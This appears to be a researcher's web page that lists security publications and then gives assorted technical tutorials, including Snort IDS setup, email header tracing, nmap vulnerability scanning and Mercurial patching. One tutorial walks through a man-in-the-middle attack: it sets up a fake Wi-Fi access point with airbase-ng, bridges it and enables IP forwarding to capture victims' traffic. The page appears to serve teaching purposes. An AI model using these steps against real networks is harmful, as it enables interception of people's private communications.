Research Publications

Research Publications:

A Measurement Study of the Content Security  Policy on Real-World Applications  [PDF]
Kailas Patil and Braun Frederik
International Journal of Network Security (IJNS),
Vol.18, No.2, PP.383-392, Mar. 2016


Towards Fine-Grained Access Control in JavaScript Contexts  [PDF]
Kailas Patil, Xinshu Dong, Xiaolei Li, Zhenkai Liang, and Xuxian Jiang.
In the 31st IEEE International Conference on Distributed Computing Systems (ICDCS),
ISSN : 1063-6927
E-ISBN : 978-0-7695-4364-2
Print ISBN: 978-1-61284-384-1
DOI: 10.1109/ICDCS.2011.87


Survey on Access Control Mechanism in Android  [PDF]
Shekhar K. Shende, Kailas R. Patil
International Journal of Electrical, Electronics and Computer Systems (IJEECS),
ISSN (Online): 2347-2820, Volume -3, Issue-4 2015


Survey on Privacy Preserving Mobile Health Monitoring System using  Cloud Computing [PDF]
Abhijeet S. Kurle,  Kailas R. Patil
International Journal of Electrical, Electronics and Computer Systems (IJEECS)
ISSN (Online): 2347-2820, Volume -3, Issue-4 2015


Poster: UserCSP-User Specified Content Security Policies [PDF]
Kailas Patil, T Vyas, F Braun, M Goodwin, Z Liang
In the proceedings of the Symposium On Usable Privacy and Security (SOUPS), 2013

How to convert a .rpm file into a .deb file

To convert a .rpm file into a .deb file you need following packages:

 $ sudo apt-get install -y rpm alien libnuma1

Now the next step is to convert all the rpm files in the current folder into deb file format, and then install them with dpkg.  Create a shell file rpmtodeb.sh and write follwing lines into it.

#/bin/bash
 for f in *.rpm; do
   fakeroot alien --to-deb $f
 done
 for f in *.deb; do
   sudo dpkg -i $f
 done

Now, change the shell file permissions to make it executable

$ sudo chmod 777  rpmtodeb.sh

Run the shell file to start the conversion

$ sh rpmtodeb.sh

latexdiff a diff tool for Latex documents

IMHO, If you want a diff of two latex file then latexdiff is a reliable tool to do that.
It also supports included .tex files in the main operating file.

To install latexdiff:
$ sudo apt-get install latexdiff

Invoke latexdiff using following command:
$ latexdiff  --flatten  /path/to/old-version/main.tex   /path/to/new-version/main.tex  >  difffile.tex

(the --flatten argument is used to recursively get inputs from any included .tex files.)

To generate PDF file use following commands:
$ pdflatex difffile
$ bibtex difffile
$ pdflatex difffile

Hope this helps!

Steps To add Repositories in kali

Open Terminal

type:
nano /etc/apt/sources.list

Copy the links below and replace with the displayed links in the File.

deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://repo.kali.org/kali kali-bleeding-edge main


Press Ctrl+x then press Enter
Then it will ask for file name....just press Enter

Then in terminal type:
apt-get update

Task Accomplished.

By: QJ

Man-in-the-Middle (MITM) Attack using Wireless Bridging on Kali Linux

In this tutorial we will perform MITM attack.
To perform Man-in-the-Middle (MITM) attack, we will create a fake access point on or laptop and monitor traffic of victim users connected to our laptop. We forward traffic of victim users to the servers therefore, they will be able to access resources on the network. Whereas all there access occurs through our laptop, hence we will be able to see all their communications.

Steps to perform MITM attack:

1. First check for wireless devices on your computer.
$ airmon-ng

2. Now create a Wireless monitoring interfaces:
$ airmon-ng start wlan0

3. Monitor what's on the wireless network such as access points in the neighborhood, wireless devices, channel used, etc
$ airodump-ng mon0

4. Create and launch our own access point (fake access point)
$ airbase-ng --essid VIIT -c 11 mon0
SSID of our access point will be "VIIT" and it is running on channel 11.

5. Verfiy details of logical access point interface
$ ifconfig at0

6. Create a bridge interface
$ brctl addbr myBridge

7. Now, associate real interfaces (eth0 and at0) to bridge interfaces
$ brctl addif myBridge eth0
$ brctl addif myBridge at0

8. Verfiy details of new bridge interface
$ brctl show

9. Remove the IP address of eth0 and at0 interfaces
$ ifconfig eth0 0.0.0.0 up
$ ifconfig at0 0.0.0.0 up

10. Assign IP address to bridge interface we have created earlier. You can use your old eth0 IP address or assign any IP free address on your network
$ ifconfig myBridge 10.10.10.1/8 up

11. Enable IP forwarding on your computer. In other word, your computer will work as a router. IT will perform NATing.
$ echo 1 > /proc/sys/net/ipv4/ip_forward

12. Now use Wireshark tool and monitor traffic of users associated with your fake wireless Access point.

Python script to convert JSON file into CSV file for easy uploading on MySQL database

This tutorial show how to use a python script that converts a JSON file data into a CSV file. And how to export CSV file data into Sqlite database using a python script.

The JSON file data is stored in the following format:

{"URL": "http://www.zoovision.com/apps-tv.html", "headerName": null, "Domain": "www.zoovision.com", "headerValue": null},
{"URL": "https://support.google.com/zagat/", "headerName": null, "Domain": "support.google.com", "headerValue": null},


Python Script File to convert a JSON file data into a CSV file: (json2csv.py)

import fileinput
import json
import csv
import sys

l = []
for line in fileinput.input():
    l.append(line)
myjson = json.loads(''.join(l))
keys = {}
for i in myjson:
    for k in i.keys():
        keys[k] = 1
mycsv = csv.DictWriter(sys.stdout, fieldnames=keys.keys(),
                       quoting=csv.QUOTE_MINIMAL)
mycsv.writeheader()
for row in myjson:
    mycsv.writerow(row)


$ python json2csv.py  fx23.json > out.csv

After executing above command, the output in the CSV file will be as follows:
http://www.zoovision.com/apps-tv.html,,www.zoovision.com,
https://support.google.com/zagat/,,support.google.com,

Now Suppose, You want to append a string at the end of each line. In other words, You want to add one more column to the CSV file, then following awk command can be used:

$ awk -F"," 'BEGIN { OFS = "," } {$4="Fx23,"; print}' out.csv  >  output.csv

It will produce output as follows:
http://www.zoovision.com/apps-tv.html,,www.zoovision.com,Fx23,
https://support.google.com/zagat/,,support.google.com,Fx23,


Python Script file to convert CSV file data into Sqlite Database: (csv2sqlite.py)

import csv, sqlite3
conn = sqlite3.connect("mydbrecord.sqlite")
curs = conn.cursor()
curs.execute("CREATE TABLE PCFC ( id INTEGER PRIMARY KEY, url TEXT, headerName TEXT, domain TEXT, headerValue TEXT, userAgent Text);")
counter = 1
reader = csv.reader(open('output.csv', 'r'), delimiter=',')
for row in reader:
    to_db = [counter, unicode(row[0], "utf8"), unicode(row[1], "utf8"), unicode(row[2], "utf8"), unicode(row[3], "utf8")]
    curs.execute("INSERT INTO PCFC (id, url, headerName, domain, headerValue) VALUES (?, ?, ?, ?, ?);", to_db)
    counter += 1
conn.commit()

Save above file and run following command to create a database.

$ python csv2sqlite.py

It will create a Sqlite database file with name mydbrecord.sqlite in the current working directory. 

Tutorial to Configure and Use Snort IDS on Windows XP

This tutorial explain steps to configure Snort on Widnows XP machine and how to use it for detection of attacks.


Steps:
1. Download Snort from "http://www.snort.org/" website.

2. Also download Rules from the same website. You need to sign up to get rules for registered users.
3. Click on the Snort_(version-number)_Installer.exe file to install it. By-default it will install snort in the "C:\Snort" directory.

4. Extract downloaded Rules file: snortrules-snapshot-(number).tar.gz

5. Copy all files from the "rules" directory of the extracted folder and paste them into "C:\Snort\rules" directory.

6. Copy "snort.conf" file from the "etc" directory of the extracted folder and paste it into "C:\Snort\etc" directory. Overwrite existing file if there is any.

7. Open command prompt (cmd.exe) and navigate to directory "C:\Snort\bin" directory.

8. To execute snort in sniffer mode use following command:
   snort -dev -i 2
   -i indicate interface number.
  -dev is used to run snort to capture packets.

  To check interface list use following command:
  snort   -W

9. To execute snort in IDS mode, we need to configure a file "snort.conf" according to our network environment.

10. Set up network address  we want to protect in snort.conf file. To do that look for "HOME_NET" and add your IP address.
   var HOME_NET 10.1.1.17/8

11. You can also set addresses or DNS_SERVERS, if you have any. otherwise go to the next step.

12. Change RULE_PATH variable with the path of rules directory.
    var RULE_PATH c:\snort\rules
13. Change the path of all libraries with the name and path on your system. or change path of snort_dynamicpreprocessor variable.
     sor file C:\Snort\lib\snort_dynamiccpreprocessor\sf_dcerpc.dll
    You need to do this to all library files in the "C:\Snort\lib" directory. The old path might be something like: "/usr/local/lib/...". you need to replace that path with you system path.

14. Change path of the "dynamicengine" variable value in the "snort.conf" file with the path of your system.  Such as:
  dynamicengine C:\Snort\lib\snort_dynamicengine\sf_engine.dll

15 Add complete path for "include classification.config" and "include reference.config" files.
   include c:\snort\etc\classification.config
   include c:\snort\etc\reference.config

16. Remove the comment on the line to allow ICMP rules, if it is alredy commented.
    include $RULE_PATH/icmp.rules

17. Similary, remove the comment of ICMP-info rules comment, if it is already commented.
    include $RULE_PATH/icmp-info.rules

18 To add log file to store alerts generated by snort, search for "output log" test and add following line:
   output alert_fast: snort-alerts.ids

19.  Comment whitelist $WHITE_LIST_PATH/white_list.rules and blacklist $BLACK_LIST_PATH/black_list.rules lines.  Also ensure that you add change the line above $WHITE_LIST_PATH
Change nested_ip inner , \  to nested_ip inner #, \

20. Comment following lines:
#preprocessor normalize_ip4
#preprocessor normalize_tcp: ips ecn stream
#preprocessor normalize_icmp4
#preprocessor normalize_ip6
#preprocessor normalize_icmp6

21. Save the "snort.conf" file and close it.

22. Go to the "C:\Snort\log" directory and create a file: snort-alerts.ids

23. To start snort in IDS mode, run following command:
     snort -c c:\snort\etc\snort.conf -l c:\snort\log -i 2 

   Above command will generate log file that will not be readable without using a tool. To read it use following command:
  C:\Snort\Bin\> snort -r ..\log\log-filename

To generate Log files in ASCII mode use following command while running snort in IDS mode:
     snort -A console -i2 -c c:\Snort\etc\snort.conf -l c:\Snort\log -K ascii

24. Scan the computer running snort from another computer using PING or launch attack. Then check snort-alerts.ids file the log folder.

You can also download my modified snort.conf file here. It works with Snort_2_9_5_Installer.exe

How to Find Email Address Source?

You might receive a lot of emails from your friends. In this tutorial we will learn how to verify that the email you received is actually from your friend and not a fake email. Attackers can easily send fake email using websites such as "emkei.cz".

Steps:
1. Select an email that you want to trace.
2. Get its full headers. For example in GMail you need to click "More" options button next to "reply" button and select "Show original" option.
3. Copy all headers from top till the To field.
4. Open either "http://whatismyipaddress.com/trace-email" and paste headers into the headers text-area.
5. Click on the "Get Source" button to get IP address of the source.
6. You can use WhoIs service (http://whois.net/) to get more information about IP address. Copy paste IP address found in the step 5 and Click on the "Go" button to get more information about the source of the IP address.

Nmap usage to perform Vulnerability Assesments

NSE Documentation Portal [http://nmap.org/nsedoc/] provides a detail guide on nmap scripts usage.

Using nmap Scripts we can perform vulnerability assessments. 

In this tutorial I will show a few examples of nmap scripts. 

1. "smb-check-vulns" script to check Windows RPC vulnerabilities. 
Checks for vulnerabilities:

• MS08-067, a Windows RPC vulnerability
• Conficker, an infection by the Conficker worm
• Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000
• SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
• MS06-025, a Windows Ras RPC service vulnerability
• MS07-029, a Windows Dns Server RPC service vulnerability

Example:

$ nmap --script smb-check-vulns.nse -p445 <targetHostIP>

Or

$ sudo nmap  --script smb-check-vulns.nse --script-args=unsafe=1 -p445 <targetHostIP>

Output:

Host script results:| smb-check-vulns:
| MS08-067: NOT VULNERABLE| Conficker: Likely CLEAN| regsvc DoS: regsvc DoS: NOT VULNERABLE| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE| MS06-025: NO SERVICE (the Ras RPC service is inactive)|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

2. "nbstat" script to retrieve the target's NetBIOS names and MAC address.

By default, the script displays the name of the computer and the logged-in user; if the verbosity is turned up.

Example:

$ sudo nmap -sU --script nbstat.nse -p137 10.15.10.30

Output: 

Host script results:

| nbstat:  

|   NetBIOS name: IT-FS, NetBIOS user: <unknown>, NetBIOS MAC: 1c:6f:65:91:19:96

|   Names

|     IT-FS<00>            Flags: <unique><active>

|     IT-FS<20>            Flags: <unique><active>

|     IT-DEPT<00>          Flags: <group><active>

|     IT-DEPT<1c>          Flags: <group><active>

|     IT-DEPT<1e>          Flags: <group><active>

|     IT-DEPT<1d>          Flags: <unique><active>

|     \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>

|_    IT-DEPT<1b>          Flags: <unique><active>

3. "upnp-info" script to extract system information from the UPnP service.

Example:

$ nmap -sV -sC 10.15.10.30

Output:

Host script results:
|_nbstat: NetBIOS name: IT-FS, NetBIOS user: <unknown>, NetBIOS MAC: 1c:6f:65:91:19:96
| smb-os-discovery:  
|   OS: Windows Server 2003 3790 (Windows Server 2003 5.2)
|   Name: IT-DEPT\IT-FS
|_  System time: 2013-07-19 14:41:14 UTC+5.5
|_smbv2-enabled: Server doesn't support SMBv2 protocol

Creating a patch to checked-in for Mozilla

To create a patch that can be easily checked-in by others make following settings on your computer.

Create .hgrc file in HOME directory (such as "/home/username"), if its not already created. Add following code to it.

[ui]
username=yyyy@xxxxx.zzz

[defaults]
diff = -p -U 8
qdiff = -p -U 8
qnew = -U

[diff]
git=1
showfunc=1
unified=8

[extensions]
mq =


Save file and close it.

To generate a patch on HG (mercurial) repository:
$ hg diff  >  patchfilename

Discarding all local changes done in the HG (mercurial) repository:
$ hg revert -a


Use Mercurial Queuing extension to generate a patch for checked in:
# setup the patch queue directory (Deprecated in 1.5)
hg qinit

# create a new patch named firstpatch
hg qnew firstpatch

# edit some files
vi filename

# update the patch to contain your changes
hg qrefresh -m "Bug XXXXX - Testing message that goes with patch"

# vi .hg/patches/firstpatch to see the result
# print the current patch to the screen
hg qdiff

# make some more changes
vi filename

# see the differences not yet stored in the patch
hg diff

# update the patch
hg qrefresh

# Look at the patches you have applied
# Look at all the patches in the queue
hg qapplied
hg qseries

# remove the top patch
hg qpop

# apply the patch again
hg qpush

# remove all patches
hg qpop -a

# apply all patches
hg qpush -a

# Output all applied patches as a single patch
hg diff -r qparent:qtip

# update the commit message on a patch
hg qrefresh -m "New Message"

# Convert all applied patches into permanent changesets
hg qfinish -a

Patch to Upload on Bugzilla:
It is available in the following folder location:
/your_repository_folder/.hg/patches/

Or you can also use following command ot generate a patch to upload:
hg export qtip  > path_to_temp_patches/patchFileName.patch